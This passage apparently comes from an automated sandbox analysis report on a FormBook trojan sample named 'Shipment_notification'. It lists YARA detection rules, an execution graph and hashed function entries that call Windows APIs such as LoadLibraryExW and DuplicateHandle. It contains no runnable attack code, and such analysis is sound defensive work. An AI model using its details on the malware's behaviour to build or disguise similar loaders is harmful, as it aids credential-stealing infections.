                                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.578168386.0000000002E90000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.577613473.0000000002920000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.577613473.0000000002920000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.577613473.0000000002920000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                              Reputation:high

                                                                              Disassembly

                                                                              Reset < >

                                                                                Execution Graph

                                                                                Execution Coverage:11.3%
                                                                                Dynamic/Decrypted Code Coverage:100%
                                                                                Signature Coverage:0%
                                                                                Total number of Nodes:99
                                                                                Total number of Limit Nodes:6
                                                                                execution_graph 12144 a79f30 12148 a7a017 12144->12148 12156 a7a028 12144->12156 12145 a79f3f 12149 a7a03b 12148->12149 12151 a7a053 12149->12151 12164 a7a2a0 12149->12164 12168 a7a2b0 12149->12168 12150 a7a04b 12150->12151 12152 a7a250 GetModuleHandleW 12150->12152 12151->12145 12153 a7a27d 12152->12153 12153->12145 12157 a7a03b 12156->12157 12158 a7a053 12157->12158 12162 a7a2a0 LoadLibraryExW 12157->12162 12163 a7a2b0 LoadLibraryExW 12157->12163 12158->12145 12159 a7a04b 12159->12158 12160 a7a250 GetModuleHandleW 12159->12160 12161 a7a27d 12160->12161 12161->12145 12162->12159 12163->12159 12165 a7a2c4 12164->12165 12167 a7a2e9 12165->12167 12172 a793d8 12165->12172 12167->12150 12169 a7a2c4 12168->12169 12170 a793d8 LoadLibraryExW 12169->12170 12171 a7a2e9 12169->12171 12170->12171 12171->12150 12173 a7a490 LoadLibraryExW 12172->12173 12175 a7a509 12173->12175 12175->12167 12176 a7c310 GetCurrentProcess 12177 a7c383 12176->12177 12178 a7c38a GetCurrentThread 12176->12178 12177->12178 12179 a7c3c7 GetCurrentProcess 12178->12179 12180 a7c3c0 12178->12180 12181 a7c3fd 12179->12181 12180->12179 12182 a7c425 GetCurrentThreadId 12181->12182 12183 a7c456 12182->12183 12184 a7c940 DuplicateHandle 12185 a7c9d6 12184->12185 12186 a740d0 12187 a740e2 12186->12187 12188 a740ee 12187->12188 12192 a741e0 12187->12192 12197 a73c64 12188->12197 12190 a7410d 12193 a74205 12192->12193 12201 a742e0 12193->12201 12205 a742d0 12193->12205 12198 a73c6f 12197->12198 12213 a751a4 12198->12213 12200 a77241 12200->12190 12203 a74307 12201->12203 12202 a743e4 12203->12202 12209 a73de8 12203->12209 12206 a74307 12205->12206 12207 a73de8 CreateActCtxA 12206->12207 12208 a743e4 12206->12208 12207->12208 12210 a75370 CreateActCtxA 12209->12210 12212 a75433 12210->12212 12212->12212 12214 a751af 12213->12214 12217 a76dc0 12214->12217 12216 a7784d 12216->12200 12218 a76dcb 12217->12218 12221 a76df0 12218->12221 12220 a77922 12220->12216 12222 a76dfb 12221->12222 12225 a76e20 12222->12225 12224 a77a22 12224->12220 12227 a76e2b 12225->12227 12226 a7817c 12226->12224 12227->12226 12229 a7c038 12227->12229 12230 a7c069 12229->12230 12231 a7c08d 12230->12231 12234 a7c1e8 12230->12234 12238 a7c1f8 12230->12238 12231->12226 12235 a7c205 12234->12235 12236 a7c23f 12235->12236 12242 a7a9c4 12235->12242 12236->12231 12240 a7c205 12238->12240 12239 a7c23f 12239->12231 12240->12239 12241 a7a9c4 2 API calls 12240->12241 12241->12239 12243 a7a9cf 12242->12243 12245 a7cf38 12243->12245 12246 a7c574 12243->12246 12245->12245 12247 a7c57f 12246->12247 12248 a76e20 2 API calls 12247->12248 12249 a7cfa7 12248->12249 12253 a7ed18 12249->12253 12260 a7ed30 12249->12260 12250 a7cfe0 12250->12245 12254 a7ed23 12253->12254 12255 a7ecdf 12253->12255 12256 a7ed6d 12254->12256 12257 a7f1b0 LoadLibraryExW GetModuleHandleW 12254->12257 12258 a7f19f LoadLibraryExW GetModuleHandleW 12254->12258 12259 a7f1e8 LoadLibraryExW GetModuleHandleW 12254->12259 12255->12250 12256->12250 12257->12256 12258->12256 12259->12256 12262 a7ed61 12260->12262 12263 a7edad 12260->12263 12261 a7ed6d 12261->12250 12262->12261 12264 a7f1b0 LoadLibraryExW GetModuleHandleW 12262->12264 12265 a7f19f LoadLibraryExW GetModuleHandleW 12262->12265 12266 a7f1e8 LoadLibraryExW GetModuleHandleW 12262->12266 12263->12250 12264->12263 12265->12263 12266->12263

                                                                                Executed Functions

                                                                                Function 00A7F1E8 Relevance: 1.5, Strings: 1, Instructions: 242COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 878 a7f1e8-a7f1f1 879 a7f1f3-a7f3a5 878->879 880 a7f1af-a7f1b3 878->880 908 a7f754-a7fafc 879->908 909 a7f3ab-a7f753 879->909 881 a7f1b9-a7f1c4 880->881 882 a7f1b4 call a7a028 880->882 886 a7f1c6-a7f1e0 881->886 887 a7f1e3-a7f1e7 881->887 882->881 886->887
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.335529206.0000000000A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A70000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_a70000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: @}q
                                                                                • API String ID: 0-843584195
                                                                                • Opcode ID: d59c1ad1693255afd0c9137e9321c3f1363476b0c633dbf4c33aaa7785bbcbea
                                                                                • Instruction ID: e34ea74785ec29642157a1d948a539e7c66546a238c8a0f53d8ee5c150fbffa7
                                                                                • Opcode Fuzzy Hash: d59c1ad1693255afd0c9137e9321c3f1363476b0c633dbf4c33aaa7785bbcbea
                                                                                • Instruction Fuzzy Hash: 95C148B1A11B46DFD320DF65EC8A1893BB1BB86324F504318D1616F6F1DBB8264ACF94
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00A7C300 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 122threadCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • GetCurrentProcess.KERNEL32 ref: 00A7C370
                                                                                • GetCurrentThread.KERNEL32 ref: 00A7C3AD
                                                                                • GetCurrentProcess.KERNEL32 ref: 00A7C3EA
                                                                                • GetCurrentThreadId.KERNEL32 ref: 00A7C443
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.335529206.0000000000A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A70000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_a70000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID: Current$ProcessThread
                                                                                • String ID: @}q
                                                                                • API String ID: 2063062207-843584195
                                                                                • Opcode ID: a3dd641a5a67ec93c414bf25d34f74d728b76be8dd512f32b139412125cce86d
                                                                                • Instruction ID: 4c0329a23369629db92f78a0a947ffcdc7ebd333f250e5c2e95da04418303611
                                                                                • Opcode Fuzzy Hash: a3dd641a5a67ec93c414bf25d34f74d728b76be8dd512f32b139412125cce86d
                                                                                • Instruction Fuzzy Hash: 505135B0D002498FDB54CFAAD988BDEBBF0BF48314F24C4AEE419A7250D7745984CB69
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00A7C310 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 120threadCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • GetCurrentProcess.KERNEL32 ref: 00A7C370
                                                                                • GetCurrentThread.KERNEL32 ref: 00A7C3AD
                                                                                • GetCurrentProcess.KERNEL32 ref: 00A7C3EA
                                                                                • GetCurrentThreadId.KERNEL32 ref: 00A7C443
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.335529206.0000000000A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A70000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_a70000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID: Current$ProcessThread
                                                                                • String ID: @}q
                                                                                • API String ID: 2063062207-843584195
                                                                                • Opcode ID: 7dba93d422394ef4488062f5a10b548af6bd75ba7a2e227983d2c84e0bd76cbe
                                                                                • Instruction ID: 46fd196d15a854e3118b5abd6667e598d01318f72bb1198432fe703f500c371c
                                                                                • Opcode Fuzzy Hash: 7dba93d422394ef4488062f5a10b548af6bd75ba7a2e227983d2c84e0bd76cbe
                                                                                • Instruction Fuzzy Hash: 795126B0D002498FDB54CFAAD948BDEBBF4BF48314F20C469E419A7350D7746984CB69
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00A7A028 Relevance: 1.7, APIs: 1, Instructions: 194COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 664 a7a028-a7a03d call a79370 667 a7a053-a7a057 664->667 668 a7a03f 664->668 669 a7a06b-a7a0ac 667->669 670 a7a059-a7a063 667->670 717 a7a045 call a7a2a0 668->717 718 a7a045 call a7a2b0 668->718 675 a7a0ae-a7a0b6 669->675 676 a7a0b9-a7a0c7 669->676 670->669 671 a7a04b-a7a04d 671->667 672 a7a188-a7a248 671->672 712 a7a250-a7a27b GetModuleHandleW 672->712 713 a7a24a-a7a24d 672->713 675->676 677 a7a0eb-a7a0ed 676->677 678 a7a0c9-a7a0ce 676->678 682 a7a0f0-a7a0f7 677->682 680 a7a0d0-a7a0d7 call a7937c 678->680 681 a7a0d9 678->681 684 a7a0db-a7a0e9 680->684 681->684 685 a7a104-a7a10b 682->685 686 a7a0f9-a7a101 682->686 684->682 689 a7a10d-a7a115 685->689 690 a7a118-a7a121 call a7938c 685->690 686->685 689->690 695 a7a123-a7a12b 690->695 696 a7a12e-a7a133 690->696 695->696 697 a7a135-a7a13c 696->697 698 a7a151-a7a155 696->698 697->698 699 a7a13e-a7a14e call a7939c call a793ac 697->699 719 a7a158 call a7a580 698->719 720 a7a158 call a7a5a8 698->720 699->698 702 a7a15b-a7a15e 705 a7a181-a7a187 702->705 706 a7a160-a7a17e 702->706 706->705 714 a7a284-a7a298 712->714 715 a7a27d-a7a283 712->715 713->712 715->714 717->671 718->671 719->702 720->702
                                                                                APIs
                                                                                • GetModuleHandleW.KERNELBASE(00000000), ref: 00A7A26E
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.335529206.0000000000A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A70000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_a70000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID: HandleModule
                                                                                • String ID:
                                                                                • API String ID: 4139908857-0
                                                                                • Opcode ID: 864ebb4430e0b1962a817e957294d4d3c2605d92bd415e99e80a528df7c671cf
                                                                                • Instruction ID: 7ae1f11d88e971ed78a22125bbcdc5a0711393725dfb13535c51103c2e92370a
                                                                                • Opcode Fuzzy Hash: 864ebb4430e0b1962a817e957294d4d3c2605d92bd415e99e80a528df7c671cf
                                                                                • Instruction Fuzzy Hash: C4711570A00B059FDB64DF29D95079BBBF1BF88310F108A2EE44ADBA50D735E9468F91
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00A75364 Relevance: 1.6, APIs: 1, Instructions: 98COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 721 a75364-a75431 CreateActCtxA 723 a75433-a75439 721->723 724 a7543a-a75494 721->724 723->724 731 a75496-a75499 724->731 732 a754a3-a754a7 724->732 731->732 733 a754a9-a754b5 732->733 734 a754b8 732->734 733->734 736 a754b9 734->736 736->736
                                                                                APIs
                                                                                • CreateActCtxA.KERNEL32(?), ref: 00A75421
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.335529206.0000000000A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A70000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_a70000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID: Create
                                                                                • String ID:
                                                                                • API String ID: 2289755597-0
                                                                                • Opcode ID: 3992089a0f8a4f5e9b46e65092a0ebe3a8ff58d6b4f664e43a8a0c57b7366d6b
                                                                                • Instruction ID: 02c88db142a85c81bba75b2c35a8f5b98bb05c7eaceda5b736e95603ad59acef
                                                                                • Opcode Fuzzy Hash: 3992089a0f8a4f5e9b46e65092a0ebe3a8ff58d6b4f664e43a8a0c57b7366d6b
                                                                                • Instruction Fuzzy Hash: 8141F5B1C0061CCFDB24DFA9C8847DDBBB5BF49304F20806AD449AB251DBB56986CF90
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00A73DE8 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 737 a73de8-a75431 CreateActCtxA 740 a75433-a75439 737->740 741 a7543a-a75494 737->741 740->741 748 a75496-a75499 741->748 749 a754a3-a754a7 741->749 748->749 750 a754a9-a754b5 749->750 751 a754b8 749->751 750->751 753 a754b9 751->753 753->753
                                                                                APIs
                                                                                • CreateActCtxA.KERNEL32(?), ref: 00A75421
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.335529206.0000000000A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A70000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_a70000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID: Create
                                                                                • String ID:
                                                                                • API String ID: 2289755597-0
                                                                                • Opcode ID: 9acf79d6b5a43d19f3a6616e200d26403817424b370da4b2582da6959caa436b
                                                                                • Instruction ID: a54b1950221e0fed3d6e29d437c6e5e5225bf27810d61598908f23e9f73f3a26
                                                                                • Opcode Fuzzy Hash: 9acf79d6b5a43d19f3a6616e200d26403817424b370da4b2582da6959caa436b
                                                                                • Instruction Fuzzy Hash: 4041C171C0061CCFDB24DFA9C9847DEBBB5BF48305F20806AD409AB251DBB56985CF94
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00A7C938 Relevance: 1.6, APIs: 1, Instructions: 64COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 847 a7c938-a7c9d4 DuplicateHandle 848 a7c9d6-a7c9dc 847->848 849 a7c9dd-a7c9fa 847->849 848->849
                                                                                APIs
                                                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00A7C9C7
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.335529206.0000000000A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A70000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_a70000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID: DuplicateHandle
                                                                                • String ID:
                                                                                • API String ID: 3793708945-0
                                                                                • Opcode ID: 2a48518a44d8fcff66b641f0665b25c368eb9e1439d7a96f435844a6947ed2ac
                                                                                • Instruction ID: 5dcbb6f598f9c1399904a3b165ad3d207cf24e4ff6b80cec8fa09b2123349378
                                                                                • Opcode Fuzzy Hash: 2a48518a44d8fcff66b641f0665b25c368eb9e1439d7a96f435844a6947ed2ac
                                                                                • Instruction Fuzzy Hash: 8E21E3B6D002089FDB10CFAAD984ADEBFF4EB48324F14841AE958A7310D374A945DFA5
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00A7C940 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 852 a7c940-a7c9d4 DuplicateHandle 853 a7c9d6-a7c9dc 852->853 854 a7c9dd-a7c9fa 852->854 853->854
                                                                                APIs
                                                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00A7C9C7
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.335529206.0000000000A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A70000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_a70000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID: DuplicateHandle
                                                                                • String ID:
                                                                                • API String ID: 3793708945-0
                                                                                • Opcode ID: f647310e43657a3cdf0abd4a4295a46af56fedc57ba8ec2fb48d2ced260ab358
                                                                                • Instruction ID: a5c0f93ec0131e78795ae2e7412ae734628f17fa2cec5595ec7d30760ac29d11
                                                                                • Opcode Fuzzy Hash: f647310e43657a3cdf0abd4a4295a46af56fedc57ba8ec2fb48d2ced260ab358
                                                                                • Instruction Fuzzy Hash: 3621C4B59002099FDB10CFAAD984ADEBFF8FB48320F14841AE959A7310D374A944DFA5
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00A793D8 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 857 a793d8-a7a4d0 859 a7a4d2-a7a4d5 857->859 860 a7a4d8-a7a507 LoadLibraryExW 857->860 859->860 861 a7a510-a7a52d 860->861 862 a7a509-a7a50f 860->862 862->861
                                                                                APIs
                                                                                • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,00A7A2E9,00000800,00000000,00000000), ref: 00A7A4FA
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.335529206.0000000000A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A70000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_a70000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID: LibraryLoad
                                                                                • String ID:
                                                                                • API String ID: 1029625771-0
                                                                                • Opcode ID: 7371bf71a7074889828d7b8203048d797cb56ac3d04561e0c0c4b07cf9dc7f38
                                                                                • Instruction ID: f7d981ad6fae6e6fd51d998a5000d56742d6f787e5128b65344731308c994825
                                                                                • Opcode Fuzzy Hash: 7371bf71a7074889828d7b8203048d797cb56ac3d04561e0c0c4b07cf9dc7f38
                                                                                • Instruction Fuzzy Hash: A311E4B6D002099FDB10CF9AC848AEEFBF4EB98710F14C42AD519B7600D3B5A945CFA5
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00A7A488 Relevance: 1.6, APIs: 1, Instructions: 54libraryCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 865 a7a488-a7a4d0 866 a7a4d2-a7a4d5 865->866 867 a7a4d8-a7a507 LoadLibraryExW 865->867 866->867 868 a7a510-a7a52d 867->868 869 a7a509-a7a50f 867->869 869->868
                                                                                APIs
                                                                                • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,00A7A2E9,00000800,00000000,00000000), ref: 00A7A4FA
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.335529206.0000000000A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A70000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_a70000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID: LibraryLoad
                                                                                • String ID:
                                                                                • API String ID: 1029625771-0
                                                                                • Opcode ID: d79d075d1bd6a97eec0e7461d3df3a0d3d5406efb1c610194ebee015691f4e85
                                                                                • Instruction ID: d73043f54f793b5bd6ed33b6091022a06f08f2d7d1f4c7161588ac9025b170e3
                                                                                • Opcode Fuzzy Hash: d79d075d1bd6a97eec0e7461d3df3a0d3d5406efb1c610194ebee015691f4e85
                                                                                • Instruction Fuzzy Hash: 2911F6B6D002099FDB10CF9AD888ADEFBF4EB98710F14842AD819A7600D375A945CFA5
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00A7A208 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 872 a7a208-a7a248 873 a7a250-a7a27b GetModuleHandleW 872->873 874 a7a24a-a7a24d 872->874 875 a7a284-a7a298 873->875 876 a7a27d-a7a283 873->876 874->873 876->875
                                                                                APIs
                                                                                • GetModuleHandleW.KERNELBASE(00000000), ref: 00A7A26E
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.335529206.0000000000A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A70000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_a70000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID: HandleModule
                                                                                • String ID:
                                                                                • API String ID: 4139908857-0
                                                                                • Opcode ID: cb7a4e46ec309fb551e4ffd14c7b06e1bd818335f4602cd632fbf59ad3168ece
                                                                                • Instruction ID: f56266b7b81f074d265839753b788dd4c7d8bf93660071ac659d7cf08496f7b9
                                                                                • Opcode Fuzzy Hash: cb7a4e46ec309fb551e4ffd14c7b06e1bd818335f4602cd632fbf59ad3168ece
                                                                                • Instruction Fuzzy Hash: 711110B2C006099FCB10CF9AC844ADEFBF4AF88324F10C52AD429A7610D379A545CFA5
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00A1D3D8 Relevance: .1, Instructions: 75COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.335015871.0000000000A1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A1D000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_a1d000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 7fe659a3fec4bebac3381c0d0d2638e4867a0f99840fbcf53303fbbd28a1b6b9
                                                                                • Instruction ID: e494c9f7a1685ae8480895c4c5b5e7fdd9dd08c2a0b403572561ea579e92edc1
                                                                                • Opcode Fuzzy Hash: 7fe659a3fec4bebac3381c0d0d2638e4867a0f99840fbcf53303fbbd28a1b6b9
                                                                                • Instruction Fuzzy Hash: 472125B5504240EFDB05DF14D9C0B56BF65FB98324F24C669E80A0F206C336E886DBA2
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00A2D1D4 Relevance: .1, Instructions: 72COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.335115241.0000000000A2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A2D000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_a2d000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: d1c926f55d2ff2e3286cfd022c4d890b32bb415bde520c7365ce9b7d9d997921
                                                                                • Instruction ID: 1821b65b4087a6dd760be958d8c69a8e97d7c3512b5c1365d43c08ae5f9c7993
                                                                                • Opcode Fuzzy Hash: d1c926f55d2ff2e3286cfd022c4d890b32bb415bde520c7365ce9b7d9d997921
                                                                                • Instruction Fuzzy Hash: AC2104B1504240EFDB05DF18E9C0B66BBA5FB84314F24CA7DE8494B247C736D846DB61
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00A2D01C Relevance: .1, Instructions: 72COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.335115241.0000000000A2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A2D000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_a2d000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 6f3417aeeb8e3716e9c91e3d6885a2a4fde874312c03f54fa93938df0ac26657
                                                                                • Instruction ID: 00b162643ed901d45934d386337c94362d397a6c69cf7f27abb6488c6fe685e3
                                                                                • Opcode Fuzzy Hash: 6f3417aeeb8e3716e9c91e3d6885a2a4fde874312c03f54fa93938df0ac26657
                                                                                • Instruction Fuzzy Hash: 4F212271608240EFCB14CF18E9C0B16BBA1FB84324F20CA79D84A0B267C336D847DA61
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00A1D3D3 Relevance: .1, Instructions: 56COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.335015871.0000000000A1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A1D000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_a1d000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: b3d282c62180620417641dd9b9a0e49e7b7255b4f86f8dc055538552fd58bc37
                                                                                • Instruction ID: 7c704aaff148e0cdca04b27f9c2b38f7ce986311496d687c568264f181b09932
                                                                                • Opcode Fuzzy Hash: b3d282c62180620417641dd9b9a0e49e7b7255b4f86f8dc055538552fd58bc37
                                                                                • Instruction Fuzzy Hash: 9C11E676504280DFDB16CF14D5C4B56BF71FB94324F28C6A9D8490F616C33AE896CBA1
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00A2D017 Relevance: .1, Instructions: 53COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.335115241.0000000000A2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A2D000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_a2d000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: f825cc49a36603e58b05d30dbcded4ff69a659c0c942629433790640a090c2f4
                                                                                • Instruction ID: 28adcdf51d95ad21bcf0c7963e26d4977ec5ba8b442ba071fef5fe444dc181a0
                                                                                • Opcode Fuzzy Hash: f825cc49a36603e58b05d30dbcded4ff69a659c0c942629433790640a090c2f4
                                                                                • Instruction Fuzzy Hash: EF119075508280DFDB15CF14E5C4B15FBA1FB84314F24C6ADD84A4B666C33AD84ACB61
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00A2D1CF Relevance: .1, Instructions: 53COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.335115241.0000000000A2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A2D000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_a2d000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: f825cc49a36603e58b05d30dbcded4ff69a659c0c942629433790640a090c2f4
                                                                                • Instruction ID: efbea88a8ddcade27ce0250a944c290cfe0dc637f4fdfef0411b78e76cfc41b7
                                                                                • Opcode Fuzzy Hash: f825cc49a36603e58b05d30dbcded4ff69a659c0c942629433790640a090c2f4
                                                                                • Instruction Fuzzy Hash: 37119D75904280DFDB16CF14D5C4B55FBB1FB84324F28C6ADD8494B656C33AD84ACB61
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00A1D745 Relevance: .0, Instructions: 45COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.335015871.0000000000A1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A1D000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_a1d000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 62803076d48ad76b4af5d1158c91b89d6ae941582302ac630b1783a6fc0f8177
                                                                                • Instruction ID: 3b2d5e80bffd08e43cd8caae009c35459f99175509d0242eec5c4216ab1666a3
                                                                                • Opcode Fuzzy Hash: 62803076d48ad76b4af5d1158c91b89d6ae941582302ac630b1783a6fc0f8177
                                                                                • Instruction Fuzzy Hash: 6901F7315083809AE7108F15CD84BA7BFE8EF41734F18851AED051F286D378A880D6B1
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00A1D744 Relevance: .0, Instructions: 36COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.335015871.0000000000A1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A1D000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_a1d000_Shipment_notification.jbxd
                                                                                Similarity
